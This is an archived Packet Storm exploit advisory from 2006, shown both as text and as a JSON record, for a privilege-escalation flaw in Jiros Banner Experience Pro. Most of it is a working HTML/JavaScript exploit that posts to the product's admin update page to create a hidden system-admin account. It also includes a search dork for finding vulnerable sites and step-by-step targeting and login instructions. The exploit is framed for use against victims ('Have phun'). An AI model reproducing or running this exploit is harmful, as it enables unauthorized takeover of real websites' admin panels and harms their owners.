Search...

Jiros.txt

2006-03-10T00:00:00

ID PACKETSTORM:44533
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-03-10T00:00:00

Description

                                        
                                            `--Security Report--  
Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 07/03/06 04:52 AM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: nukedx@nukedx.com  
Web: http://www.nukedx.com  
}  
---  
Vendor: Jiros (http://www.jiros.net)  
Version: 1.0 and prior versions must be affected.  
About: Via this method remote attacker can by pass security control of system  
and edit all options.  
Level: Critical  
---  
How&Example:  
Security control in admin panel's index did not sanitized properly.  
GET/EXAMPLE -&gt; http://[victim]/[JBPSDir]/files/ wtih this example remote attack  
bypasses security control,  
but s/he will get some errors because ; s/he did not logged in system and doesnt  
have admin cookies so lets add a new  
admin account :)  
GET/EXAMPLE -&gt; http://[victim]/[JBPSDir]/files/addadmin.asp so with this example  
remote attacker can make admin account  
succesfully and when he logins via http://[victim]/[JBPSDir]/files/login.asp can  
take whole system control.  
---  
Timeline:  
* 07/03/2006: Vulnerability found.  
* 07/03/2006: Contacted with vendor and waiting reply.  
---  
Exploit:  
http://www.nukedx.com/?getxpl=19  
With this exploit remote attacker can make new admin account.  
  
&lt;html&gt;  
&lt;title&gt;Jiros Banner Experience Pro Unauthorized Admin Add Exploit&lt;/title&gt;  
&lt;body bgcolor="#000000"&gt;  
&lt;style&gt;  
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}  
&lt;/style&gt;  
&lt;script language="JavaScript"&gt;  
function jbxpl() {  
if (document.xplt.victim.value=="") {  
alert("Please enter site!");  
return false;  
}  
if (confirm("Are you sure?")) {  
xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";  
xplt.aName.value=document.xplt.aName.value;  
xplt.aEmail.value=document.xplt.aEmail.value;  
xplt.aPassword.value=document.xplt.aPassword.value;  
xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;  
xplt.aIsActive=document.xplt.aIsActive.value;  
xplt.submit();  
}  
}  
&lt;/script&gt;  
&lt;strong&gt;  
&lt;font class="xpl" color="#00FF40"&gt;  
&lt;pre&gt;  
&lt;center&gt;  
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit  
This exploit has been coded by nukedx  
You can found original advisory on http://www.nukedx.com/?viewdoc=19  
Dork for this exploit: &lt;u&gt;inurl:JBSPro&lt;/u&gt;  
Your target must be like that: www.victim.com/Path/  
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp  
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/  
For second example your target must be www.victim.com/  
You can login with your admin account via www.victim.com/JBSPath/files/login.asp  
Have phun  
&lt;form name="xplt" method="POST" onsubmit="jbxpl();"&gt;  
Target -&gt; &lt;input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl"&gt;  
&lt;input type="text" name="aName" value="Enter Username" class="xpl" size="30"&gt;  
&lt;input type="text" name="aEmail" value="Enter Email" class="xpl" size="30"&gt;  
&lt;input type="text" name="aPassword" value="Enter Password" class="xpl" size="30"&gt;  
&lt;input type="hidden" name="aIsSystemAdmin" value="True"&gt;  
&lt;input type="hidden" name="aIsActive" value="True"&gt;  
&lt;input type="submit" value="Send" class="xpl"&gt;  
&lt;/form&gt;  
&lt;/pre&gt;  
&lt;/font&gt;  
&lt;/strong&gt;  
&lt;/body&gt;  
&lt;/html&gt;  
  
Save this code as .htm and then execute.  
  
# nukedx.com [2006-03-07]  
  
  
  
---  
Dorks:  
inurl:JBSPro  
---  
Original advisory: http://www.nukedx.com/?viewdoc=19  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:44533", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Jiros.txt", "description": "", "published": "2006-03-10T00:00:00", "modified": "2006-03-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/44533/Jiros.txt.html", "reporter": "Mustafa Can Bjorn", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:32", "viewCount": 1, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:26:32", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:32", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/44533/Jiros.txt", "sourceData": "`--Security Report-- \nAdvisory: Jiros Banner Experience Pro Remote Privilege Escalation. \n--- \nAuthor: Mustafa Can Bjorn \"nukedx a.k.a nuker\" IPEKCI \n--- \nDate: 07/03/06 04:52 AM \n--- \nContacts:{ \nICQ: 10072 \nMSN/Email: nukedx@nukedx.com \nWeb: http://www.nukedx.com \n} \n--- \nVendor: Jiros (http://www.jiros.net) \nVersion: 1.0 and prior versions must be affected. \nAbout: Via this method remote attacker can by pass security control of system \nand edit all options. \nLevel: Critical \n--- \nHow&Example: \nSecurity control in admin panel's index did not sanitized properly. \nGET/EXAMPLE -> http://[victim]/[JBPSDir]/files/ wtih this example remote attack \nbypasses security control, \nbut s/he will get some errors because ; s/he did not logged in system and doesnt \nhave admin cookies so lets add a new \nadmin account :) \nGET/EXAMPLE -> http://[victim]/[JBPSDir]/files/addadmin.asp so with this example \nremote attacker can make admin account \nsuccesfully and when he logins via http://[victim]/[JBPSDir]/files/login.asp can \ntake whole system control. \n--- \nTimeline: \n* 07/03/2006: Vulnerability found. \n* 07/03/2006: Contacted with vendor and waiting reply. \n--- \nExploit: \nhttp://www.nukedx.com/?getxpl=19 \nWith this exploit remote attacker can make new admin account. \n \n<html> \n<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title> \n<body bgcolor=\"#000000\"> \n<style> \n.xpl {font-family:tahoma; font-size:11px; text-decoration: none;} \n</style> \n<script language=\"JavaScript\"> \nfunction jbxpl() { \nif (document.xplt.victim.value==\"\") { \nalert(\"Please enter site!\"); \nreturn false; \n} \nif (confirm(\"Are you sure?\")) { \nxplt.action=\"http://\"+document.xplt.victim.value+\"files/update.asp?Action=AddAdmin\"; \nxplt.aName.value=document.xplt.aName.value; \nxplt.aEmail.value=document.xplt.aEmail.value; \nxplt.aPassword.value=document.xplt.aPassword.value; \nxplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value; \nxplt.aIsActive=document.xplt.aIsActive.value; \nxplt.submit(); \n} \n} \n</script> \n<strong> \n<font class=\"xpl\" color=\"#00FF40\"> \n<pre> \n<center> \nWelcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit \nThis exploit has been coded by nukedx \nYou can found original advisory on http://www.nukedx.com/?viewdoc=19 \nDork for this exploit: <u>inurl:JBSPro</u> \nYour target must be like that: www.victim.com/Path/ \nThe sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp \nIf the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ \nFor second example your target must be www.victim.com/ \nYou can login with your admin account via www.victim.com/JBSPath/files/login.asp \nHave phun \n<form name=\"xplt\" method=\"POST\" onsubmit=\"jbxpl();\"> \nTarget -> <input type=\"text\" name=\"victim\" value=\"www.victim.com/Path/\" size=\"44\" class=\"xpl\"> \n<input type=\"text\" name=\"aName\" value=\"Enter Username\" class=\"xpl\" size=\"30\"> \n<input type=\"text\" name=\"aEmail\" value=\"Enter Email\" class=\"xpl\" size=\"30\"> \n<input type=\"text\" name=\"aPassword\" value=\"Enter Password\" class=\"xpl\" size=\"30\"> \n<input type=\"hidden\" name=\"aIsSystemAdmin\" value=\"True\"> \n<input type=\"hidden\" name=\"aIsActive\" value=\"True\"> \n<input type=\"submit\" value=\"Send\" class=\"xpl\"> \n</form> \n</pre> \n</font> \n</strong> \n</body> \n</html> \n \nSave this code as .htm and then execute. \n \n# nukedx.com [2006-03-07] \n \n \n \n--- \nDorks: \ninurl:JBSPro \n--- \nOriginal advisory: http://www.nukedx.com/?viewdoc=19 \n \n`\n"}